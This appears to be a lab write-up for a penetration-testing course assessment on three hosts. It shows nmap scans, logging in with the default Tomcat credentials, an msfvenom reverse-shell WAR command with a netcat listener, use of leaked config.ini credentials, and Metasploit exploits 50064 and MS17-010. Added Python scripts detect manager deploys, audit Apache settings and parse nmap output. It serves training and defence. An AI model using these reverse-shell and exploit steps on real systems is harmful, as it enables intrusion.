CPTS Journey Series – Shells & Payloads Skill Assessment

Question 1: What is the hostname of Host-1? (Format: all lower case)

We start with an nmap scan of Host 1:

Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 15:37 EDT
Nmap scan report for status.inlanefreight.local (172.16.1.11)
Host is up (0.0028s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Inlanefreight Server Status
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
515/tcp open printer
1801/tcp open msmq?
2103/tcp open msrpc Microsoft Windows RPC
2105/tcp open msrpc Microsoft Windows RPC
2107/tcp open msrpc Microsoft Windows RPC
3387/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-04-05T19:38:48+00:00; -58s from scanner time.
| ssl-cert: Subject: commonName=shells-winsvr
| Not valid before: 2026-04-04T19:23:28
|_Not valid after: 2026-10-04T19:23:28
| rdp-ntlm-info:
| Target_Name: SHELLS-WINSVR
| NetBIOS_Domain_Name: SHELLS-WINSVR
| NetBIOS_Computer_Name: SHELLS-WINSVR
| DNS_Domain_Name: shells-winsvr
| DNS_Computer_Name: shells-winsvr
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-05T19:38:42+00:00
5504/tcp open msrpc Microsoft Windows RPC
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Apache Tomcat 10.0.11
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.0.11
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:B0:0B:4D (VMware)
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (97%), Microsoft Windows 10 1709 - 1803 (94%), Microsoft Windows Server 2012 (93%), Microsoft Windows Longhorn (92%), Microsoft Windows Vista SP1 (92%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (91%), Microsoft Windows 10 1809 - 1909 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 1h23m02s, deviation: 3h07m50s, median: -58s
| smb2-time:
| date: 2026-04-05T19:38:42
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: shells-winsvr
| NetBIOS computer name: SHELLS-WINSVR\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-04-05T12:38:42-07:00
|_nbstat: NetBIOS name: SHELLS-WINSVR, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:0b:4d (VMware)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.03 seconds

The nmap scan (nbstat and smb-os-discovery host scripts, and the RDP certificate) shows the NetBIOS name SHELLS-WINSVR, so the hostname is shells-winsvr.


Question 2: Exploit the target and gain a shell session. Submit the name of the folder located in C:\Shares\ (Format: all lower case)

My first thought is to check the Apache Tomcat server exposed on port 8080. Connecting to this portal led to the manager screen, but this required credentials. I tried some default credentials, and was able to log in using tomcat:Tomcatadm.

From here we can upload a WAR file through the manager application, which gives us an attack vector for a shell: generate a reverse-shell WAR with msfvenom, start a listener, then deploy the WAR from the manager page:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.1.5 LPORT=4444 -f war -o shell.war
nc -lvnp 4444
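On the defensive side, a WAR deployed through the manager application leaves a clear trail in Tomcat's access log (the default AccessLogValve pattern is %h %l %u %t "%r" %s %b). The following Python script is an added example, not code from the original post or from the Tomcat project: it parses constructed access-log lines, flags every successful POST/PUT to a manager deploy or upload endpoint (with the authenticated user and, for the text API, the context path), and also reports repeated 401s against /manager/ from one address. The sample log lines, the addresses in them and the fail_threshold parameter are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Manager-application endpoints that place a new web application on the server.
DEPLOY_PREFIXES = (
    "/manager/html/upload",  # HTML GUI: "WAR file to deploy" form (multipart POST)
    "/manager/html/deploy",  # HTML GUI: deploy from a path already on the server (POST)
    "/manager/text/deploy",  # text/script API: PUT with the WAR as the request body
    "/manager/deploy",       # older alias of the text API
)

# Constructed sample log (assumption), not a capture from the lab host.
SAMPLE_LOG = """\
172.16.1.5 - - [05/Apr/2026:15:52:10 -0400] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - - [05/Apr/2026:15:52:11 -0400] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - - [05/Apr/2026:15:52:12 -0400] "GET /manager/html HTTP/1.1" 401 2473
172.16.1.5 - tomcat [05/Apr/2026:15:52:14 -0400] "GET /manager/html HTTP/1.1" 200 18492
10.0.0.7 - - [05/Apr/2026:15:52:30 -0400] "GET /index.html HTTP/1.1" 200 11156
172.16.1.5 - tomcat [05/Apr/2026:15:53:01 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=F00 HTTP/1.1" 200 19030
172.16.1.5 - tomcat [05/Apr/2026:15:53:05 -0400] "GET /shell/ HTTP/1.1" 200 0
172.16.1.5 - tomcat [05/Apr/2026:15:55:20 -0400] "PUT /manager/text/deploy?path=/reports&update=true HTTP/1.1" 200 40
this line is deliberately malformed and must be skipped
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])          # split "/path?query" from the request line
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def analyze(lines, fail_threshold=3):
    """Flag manager deployments and repeated manager auth failures."""
    findings = []
    failures = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].startswith("/manager/") and rec["status"] == 401:
            failures[rec["ip"]] += 1
        # The HTML manager answers a successful upload with its listing page (200);
        # treat a 302 as success too in case a redirect-based front end is in play.
        if (rec["path"].startswith(DEPLOY_PREFIXES)
                and rec["method"] in ("POST", "PUT")
                and rec["status"] in (200, 302)):
            findings.append({
                "type": "manager_deploy",
                "ip": rec["ip"],
                "user": rec["user"],
                "ts": rec["ts"],
                "endpoint": rec["path"],
                # The text API names the context in the query string; the HTML
                # upload form takes it from the WAR file name instead.
                "context": rec["query"].get("path", ["(from uploaded WAR name)"])[0],
            })
    for ip, count in failures.items():
        if count >= fail_threshold:
            findings.append({"type": "manager_auth_failures", "ip": ip, "count": count})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG.splitlines()):
        print(finding)
```

Run against a real localhost_access_log.*.txt with analyze(open(path).readlines()); any manager_deploy finding that does not line up with a change ticket is worth a look, and the same request pattern is what a WAF or reverse-proxy rule should block when the manager application is not supposed to be reachable from that network.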

Question 3: What distribution of Linux is running on Host-2? (Format: distro name, all lower case)

Let's run an nmap scan of Host 2:

Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 17:16 EDT
Nmap scan report for blog.inlanefreight.local (172.16.1.12)
Host is up (0.0096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f6:21:98:29:95:4c:a4:c2:21:7e:0e:a4:70:10:8e:25 (RSA)
| 256 6c:c2:2c:1d:16:c2:97:04:d5:57:0b:1e:b7:56:82:af (ECDSA)
|_ 256 2f:8a:a4:79:21:1a:11:df:ec:28:68:c2:ff:99:2b:9a (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Inlanefreight Gabber
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:50:56:B0:FC:6E (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.57 seconds

From the scan we can see Host 2 runs Ubuntu: both the OpenSSH and the Apache version strings carry the Ubuntu package suffix.


Question 4: What language is the shell written in that gets uploaded when using the 50064.rb exploit?

A quick Google search reveals that the shell this exploit uploads is written in PHP; alternatively, searchsploit -p 50064 prints the path to the exploit file so it can be read locally to find the same answer.


Question 5: Exploit the blog site and establish a shell session with the target OS. Submit the contents of /customscripts/flag.txt

We immediately notice from the prior section that the CMS is likely vulnerable to 50064.rb; however, that exploit requires credentials. Let's enumerate further to see what else we can find. Directory enumeration turns up a few sub-directories. I start with the first one, /data, and request it with curl:

curl http://blog.inlanefreight.local/data/

The directory listing shows a config.ini file in this folder. Opening it reveals a set of admin credentials, which may be the ones we need to log in to the blog.

Running the 50064 exploit in Metasploit with those credentials gets us a Meterpreter shell, which we can use to fetch the flag.
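The root cause on Host-2 is configuration rather than code: directory listing was enabled on /data and a credential-bearing config.ini sat inside the web root. As an added example (not part of the original post, and not the blog's real vhost), here is a constructed Apache vhost with those weak settings beside a hardened version, plus a small Python audit that reports an Options line enabling Indexes and the absence of a FilesMatch block denying *.ini files. The paths, the server name and the list of denied extensions are assumptions.

```python
import re

# Constructed vhost resembling the weak state on Host-2 (assumption, not the real config).
WEAK_CONFIG = """
<VirtualHost *:80>
    ServerName blog.inlanefreight.local
    DocumentRoot /var/www/blog
    <Directory /var/www/blog>
        Options Indexes FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
</VirtualHost>
"""

# Same vhost with listings turned off and config-style files never served.
HARDENED_CONFIG = """
<VirtualHost *:80>
    ServerName blog.inlanefreight.local
    DocumentRoot /var/www/blog
    <Directory /var/www/blog>
        Options -Indexes +FollowSymLinks
        AllowOverride None
        Require all granted
    </Directory>
    # Secrets belong outside DocumentRoot; this block is the safety net if they are not.
    <FilesMatch "\\.(ini|env|conf|bak|sql)$">
        Require all denied
    </FilesMatch>
</VirtualHost>
"""

DIR_OPEN = re.compile(r"<Directory\s+\"?([^\">]+)\"?>", re.I)
FILES_OPEN = re.compile(r"<FilesMatch\s+\"?([^\">]+)\"?>", re.I)
OPTIONS = re.compile(r"Options\s+(.+)", re.I)
DENY = re.compile(r"Require\s+all\s+denied", re.I)


def audit_apache_config(text):
    """Return findings for the two weaknesses abused on Host-2 (listing, served .ini)."""
    findings = []
    scope = "server scope"          # which <Directory> an Options line applies to
    in_ini_block = False            # inside a <FilesMatch> whose pattern covers .ini
    ini_protected = False
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()   # drop comments and surrounding whitespace
        if not line:
            continue
        m = DIR_OPEN.match(line)
        if m:
            scope = m.group(1)
            continue
        if line.lower().startswith("</directory>"):
            scope = "server scope"
            continue
        m = OPTIONS.match(line)
        if m:
            # "Indexes" or "+Indexes" enables listings; "-Indexes" disables them.
            enabled = [o for o in m.group(1).split()
                       if not o.startswith("-") and o.lstrip("+").lower() == "indexes"]
            if enabled:
                findings.append(f"line {lineno}: directory listing enabled in {scope}")
            continue
        m = FILES_OPEN.match(line)
        if m:
            in_ini_block = "ini" in m.group(1)
            continue
        if line.lower().startswith("</filesmatch>"):
            in_ini_block = False
            continue
        if in_ini_block and DENY.match(line):
            ini_protected = True
    if not ini_protected:
        findings.append("no <FilesMatch> block denies access to *.ini files")
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_apache_config(cfg) or ["no findings"])
```

The audit is deliberately line-based and only knows the two directives the incident hinged on; it is a quick check to run over /etc/apache2/sites-enabled/*, not a replacement for reading the full configuration. The better fix is still to move config.ini out of the web root altogether so that no directive has to protect it.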


Question 6: What is the hostname of Host-3?

sudo nmap -sC -sV -O -T5 -p- 172.16.1.13

Starting Nmap 7.92 ( https://nmap.org ) at 2026-04-05 18:08 EDT
Stats: 0:02:05 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 18:11 (0:00:46 remaining)
Nmap scan report for 172.16.1.13
Host is up (0.0055s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: 172.16.1.13 - /
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:50:56:B0:08:83 (VMware)
Device type: general purpose
Running: Microsoft Windows 2016
OS CPE: cpe:/o:microsoft:windows_server_2016
OS details: Microsoft Windows Server 2016 build 10586 - 14393
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:08:83 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h20m01s, deviation: 4h02m29s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: SHELLS-WINBLUE
| NetBIOS computer name: SHELLS-WINBLUE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2026-04-05T15:10:50-07:00
| smb2-time:
| date: 2026-04-05T22:10:50
|_ start_date: 2026-04-05T21:28:08

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.10 seconds

The nbstat and smb-os-discovery results in the nmap scan give the hostname: SHELLS-WINBLUE.


Question 7: Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt

The Windows Server 2016 build (14393) immediately makes me suspect this server may be susceptible to MS17-010. A quick check in Metasploit confirms this, and we are quickly able to get a shell and secure the third flag.
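Questions 1, 6 and 7 all pull the same facts out of nmap's normal output: the hostname from the nbstat and smb-os-discovery scripts, the OS string, and the SMB signing state that the host scripts report. The following Python parser is an added example, not the post's own tooling or part of nmap: it reads a single-host block of normal output, recovers the lowercase hostname the assessment asks for, and turns the SMB findings into the defender-side issues a report would list (SMBv1 still negotiated, signing not required, management ports reachable). The sample input is a trimmed excerpt of the Host-3 scan above; the assumption that the smb-security-mode script only answers when SMBv1 is negotiated is noted in the code.

```python
import re

HOST_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>[\d.]+)\)?$")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+open\s+(?P<service>\S+)\s*(?P<version>.*)$")
NBNAME_RE = re.compile(r"NetBIOS name: ([^,]+)")

# Trimmed excerpt of the Host-3 scan shown above, used here as sample input.
SAMPLE_SCAN = """
Nmap scan report for 172.16.1.13
Host is up (0.0055s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Host script results:
| smb-security-mode:
|   account_used: <blank>
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SHELLS-WINBLUE, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:08:83 (VMware)
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: SHELLS-WINBLUE
"""


def parse_nmap(text):
    """Parse a single-host block of nmap normal output (stdout or -oN)."""
    host = {"ip": None, "dns_name": None, "netbios_name": None, "computer_name": None,
            "os": None, "open_ports": [], "smb1_seen": False, "smb1_signing": None,
            "smb2_signing_required": None}
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host["ip"], host["dns_name"] = m.group("ip"), m.group("name")
            continue
        m = PORT_RE.match(line)
        if m:
            host["open_ports"].append(
                (int(m.group("port")), m.group("service"), m.group("version").strip()))
            continue
        if not line.startswith("|"):      # only NSE script output from here on
            continue
        body = line.lstrip("|_ ")
        if body.startswith("smb-security-mode"):
            # Assumption: this script negotiates SMBv1, so its presence means SMBv1 is on.
            host["smb1_seen"] = True
        elif body.startswith("message_signing:"):
            host["smb1_signing"] = body.split(":", 1)[1].split("(")[0].strip()
        elif body.startswith("Message signing"):          # smb2-security-mode wording
            host["smb2_signing_required"] = "not required" not in body
        elif body.startswith("Computer name:"):            # smb-os-discovery
            host["computer_name"] = body.split(":", 1)[1].strip()
        elif body.startswith("OS:"):
            host["os"] = body.split(":", 1)[1].strip()
        else:
            nb = NBNAME_RE.search(body)                    # nbstat one-liner
            if nb:
                host["netbios_name"] = nb.group(1).strip()
    return host


def hostname(host):
    """Hostname in the format the assessment asks for (all lower case)."""
    name = host["computer_name"] or host["netbios_name"] or host["dns_name"] or host["ip"]
    return name.lower()


def assess(host):
    """Defender-side findings drawn from the same scan."""
    issues = []
    if host["smb1_seen"]:
        issues.append("SMBv1 still negotiated; disable it (MS17-010 lives in the SMBv1 code path)")
    if host["smb1_signing"] == "disabled" or host["smb2_signing_required"] is False:
        issues.append("SMB signing not required; set RequireSecuritySignature to block relay")
    ports = {p for p, _, _ in host["open_ports"]}
    mgmt = [name for port, name in ((3389, "RDP"), (5985, "WinRM")) if port in ports]
    if mgmt:
        issues.append("remote management reachable from the scanning host: " + ", ".join(mgmt))
    return issues


if __name__ == "__main__":
    h = parse_nmap(SAMPLE_SCAN)
    print("hostname:", hostname(h))
    print("os:", h["os"])
    for issue in assess(h):
        print("-", issue)
```

Feed it the saved output of the scan command used above (nmap ... -oN host3.nmap, then parse_nmap(open("host3.nmap").read())) and the same three facts fall out for Host-1, where the nbstat line reads SHELLS-WINSVR and the smb2 block is identical.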
